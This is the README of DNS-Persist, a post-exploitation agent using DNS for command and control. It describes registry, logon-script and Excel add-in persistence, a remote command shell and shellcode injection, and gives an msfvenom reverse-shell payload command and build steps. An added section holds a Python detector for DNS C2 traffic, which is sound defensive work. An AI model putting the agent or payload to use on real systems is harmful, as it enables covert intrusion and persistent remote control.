
0x09AL / Dns Persist

Licence: MIT
DNS-Persist is a post-exploitation agent which uses DNS for command and control.


DNS-Persist

DNS-Persist is a post-exploitation agent which uses DNS for command and control. The server-side code is in Python and the agent is written in C++. This is the first version; more features and improvements will be added in the future.

Getting Started

Author

0x09AL - https://twitter.com/0x09al

Disclaimer

DO NOT USE THIS SOFTWARE FOR ILLEGAL PURPOSES.

THE AUTHOR TAKES NO RESPONSIBILITY FOR ANY MISUSE OF THE CODE PROVIDED HERE.

Did I reinvent the wheel?

There is a lot of great work on DNS C2, but I created this software to be more focused on the persistence part. I'm no expert in C++ and this is my first "real program" in C++ (so expect some cringe-worthy code).

Suggestions for features and improvements are welcome.

Architecture

There are two main parts:

  1. DNS server
  2. Agent


Features

Persistence mechanisms

This version has only 3 persistence mechanisms. More will be added later.

  1. LogonScript persistence.
  2. RunKey persistence.
  3. Excel Addin persistence.

'Interactive' command shell

This version supports a pseudo-interactive command shell that you can use to execute system commands.

Shellcode Injection

This version supports injection of 32-bit shellcode. The shellcode is executed in a new thread inside the agent process, so shellcode that crashes or is invalid will also crash the agent. Avoid NULL bytes in the shellcode.

Shellcode generation example

msfvenom -p windows/meterpreter/reverse_tcp LHOST=ip LPORT=port EXITFUNC=thread -b "\x00" -f hex -o /tmp/shellcode.hex

TODO LIST

  1. Add encryption. This version does not have any encryption, so use it at your own risk.
  2. Add more persistence mechanisms.
  3. Agents in other programming languages.

Installation & Usage

Server side

pip install dnslib
git clone https://github.com/0x09AL/DNS-Persist
python server.py

By default a DNS server is started on port 53. You can change that in the server.py file.

Agent

I used Visual Studio 2010 to code the agent, so importing and compiling it should be fairly easy.

Remember to change DOMAIN_NAME in Declarations.h to match your domain name.

The domain nameservers should point to the DNS-Persist IP address.

#define DOMAIN_NAME "example.com"
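Because every agent message is a query for a name under DOMAIN_NAME that is answered by the DNS-Persist server, the traffic has a recognisable shape on the defender's resolver. The following is an added example, not part of the DNS-Persist project, that scores constructed resolver log lines for that shape: many queries from one client to one zone, almost all for distinct names, with high-entropy leftmost labels. The log format, the thresholds and the two-label zone heuristic are assumptions.

```python
import math
from collections import Counter, defaultdict

# Constructed resolver log lines ("client qname qtype"), not real traffic.
SAMPLE_LOG = """\
10.0.0.5 www.example.org A
10.0.0.5 mail.example.org MX
10.0.0.7 7a6f8c1d2e.cmd.attacker.test TXT
10.0.0.7 8b5e9d0a1f.cmd.attacker.test TXT
10.0.0.7 2c3d4e5f6a7b.cmd.attacker.test TXT
10.0.0.7 9d8c7b6a5f4e.cmd.attacker.test TXT
10.0.0.7 1f2e3d4c5b6a.cmd.attacker.test TXT
10.0.0.7 www.example.org A
"""

def parse_log(text):
    """Yield (client, qname) from the constructed log format above."""
    for line in text.splitlines():
        parts = line.split()
        if len(parts) >= 2:
            yield parts[0], parts[1].lower().rstrip(".")

def base_domain(qname):
    """Zone approximated as the last two labels (assumption; use a public-suffix list in production)."""
    return ".".join(qname.split(".")[-2:])

def label_entropy(label):
    """Shannon entropy in bits per character; encoded data scores high."""
    n = len(label)
    return -sum(c / n * math.log2(c / n) for c in Counter(label).values()) if n else 0.0

def find_suspects(text, min_queries=5, min_unique_ratio=0.8, min_entropy=3.0):
    """Return {(client, zone): stats} for pairs that look like a DNS C2 channel:
    repeated polling, almost every name distinct, high-entropy leftmost labels."""
    per_pair = defaultdict(lambda: {"queries": 0, "names": set(), "entropy": 0.0})
    for client, qname in parse_log(text):
        s = per_pair[(client, base_domain(qname))]
        s["queries"] += 1
        s["names"].add(qname)
        s["entropy"] += label_entropy(qname.split(".")[0])
    suspects = {}
    for key, s in per_pair.items():
        ratio = len(s["names"]) / s["queries"]
        mean_ent = s["entropy"] / s["queries"]
        if s["queries"] >= min_queries and ratio >= min_unique_ratio and mean_ent >= min_entropy:
            suspects[key] = {"queries": s["queries"], "unique_ratio": ratio,
                             "mean_entropy": round(mean_ent, 2)}
    return suspects
```

Calling find_suspects(SAMPLE_LOG) flags only the 10.0.0.7 / attacker.test pair; on real logs, feed the resolver's query log in the same client/qname form and tune the thresholds to your baseline.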

Screenshots

  1. Picture-1
  2. Picture-2
  3. Picture-3
  4. Picture-4
